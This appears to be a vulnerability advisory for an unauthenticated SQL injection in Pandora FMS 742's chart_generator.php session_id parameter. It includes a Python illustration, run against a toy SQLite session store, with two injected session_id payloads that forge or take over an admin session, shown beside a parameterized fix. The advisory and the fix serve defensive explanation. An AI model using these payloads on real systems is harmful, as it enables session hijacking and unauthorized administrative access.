PT-2020-6798 · Artica · Artica Pandora Fms

Dennis Brinkrolf

·

Published

2020-01-17

·

Updated

2025-07-19

·

CVE-2021-32099

CVSS v2.0

10

Critical

Vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions Artica Pandora FMS version 742
Description A SQL injection issue in the pandora_console component allows an unauthenticated attacker to bypass login restrictions by exploiting the session_id parameter of the "/include/chart_generator.php" endpoint. The vulnerability is exploitable remotely and without credentials: the attacker can execute arbitrary SQL statements against the console database and upgrade an unprivileged session to a privileged one.
Recommendations For Artica Pandora FMS version 742, restrict access to the "/include/chart_generator.php" endpoint (for example, to trusted networks only) until a patch is available. Note that the session_id parameter is supplied by the attacker, so filtering it at the web server reduces exposure but does not replace a code fix in which the parameter is bound rather than concatenated into the query. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
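The description above names the bug class (a session identifier concatenated into a session-store lookup) and its consequence (an unprivileged or anonymous request resolves to a privileged session). The following Python example, added here for illustration and not code from this page or from Pandora FMS, models that class against an in-memory SQLite table: the table name, column names, session-data format, sample rows and injected values are all assumptions constructed for the example. It shows the vulnerable lookup beside the parameterized one and how the same injected value behaves under each.

```python
import re
import sqlite3

# Constructed, simplified model of a PHP session store keyed by session id.
# Table and column names are assumptions for this illustration; they are not
# a copy of Pandora FMS's schema or code.
SCHEMA = """
CREATE TABLE tsessions_php (
    id_session  TEXT PRIMARY KEY,
    last_active INTEGER NOT NULL,
    data        TEXT NOT NULL   -- PHP-style 'key|serialized;' session payload
);
"""

# Constructed sample rows: a low-privilege session and an admin session.
SAMPLE_ROWS = [
    ("a1b2c3", 1700000000, 'id_usuario|s:3:"bob";'),
    ("d4e5f6", 1700000100, 'id_usuario|s:5:"admin";'),
]

# Injected session_id value (constructed). The quote closes the literal,
# UNION appends a forged row whose data column names the admin user, and
# the trailing comment swallows the closing quote the query template adds.
FORGED_ADMIN = "' UNION SELECT 'x', 36000, 'id_usuario|s:5:\"admin\";' -- "

# A second injected value (constructed) that forges nothing and instead
# selects an existing session whose data mentions the admin user.
STEAL_ADMIN = "' OR data LIKE '%\"admin\"%' -- "


def make_db():
    """Create the in-memory store and load the constructed sample sessions."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def lookup_vulnerable(db, session_id):
    """Bug class on this page: the untrusted session_id is concatenated into SQL."""
    sql = ("SELECT id_session, last_active, data FROM tsessions_php "
           "WHERE id_session = '" + session_id + "'")
    return db.execute(sql).fetchone()


def lookup_safe(db, session_id):
    """Hardened form: the value is bound, so it can only ever be compared."""
    sql = ("SELECT id_session, last_active, data FROM tsessions_php "
           "WHERE id_session = ?")
    return db.execute(sql, (session_id,)).fetchone()


_USER_RE = re.compile(r'id_usuario\|s:(\d+):"([^"]*)";')


def user_from_session_data(blob):
    """Extract id_usuario from the simplified payload; None if it is absent or the
    declared string length does not match (the way unserialize would reject it)."""
    m = _USER_RE.search(blob)
    if m is None or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2)


def resolve_user(lookup, db, session_id):
    """Which user the application would treat as logged in for this session_id."""
    row = lookup(db, session_id)
    if row is None:
        return None
    return user_from_session_data(row[2])


if __name__ == "__main__":
    db = make_db()
    cases = [("legit", "a1b2c3"), ("forged", FORGED_ADMIN), ("steal", STEAL_ADMIN)]
    for label, sid in cases:
        print(f"{label:6} vulnerable -> {resolve_user(lookup_vulnerable, db, sid)!r}"
              f"   safe -> {resolve_user(lookup_safe, db, sid)!r}")
```

Both injected values resolve to the admin user through the concatenating lookup, one by fabricating a session row and one by selecting a real one, while the bound-parameter lookup compares the whole injected string against id_session and finds nothing. A trailing comment marker is part of each payload because the query template appends a closing quote after the attacker-controlled value.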

Exploit

SQL injection

Weakness Enumeration

Related Identifiers

BDU:2022-06602
CVE-2021-32099

Affected Products

Artica Pandora Fms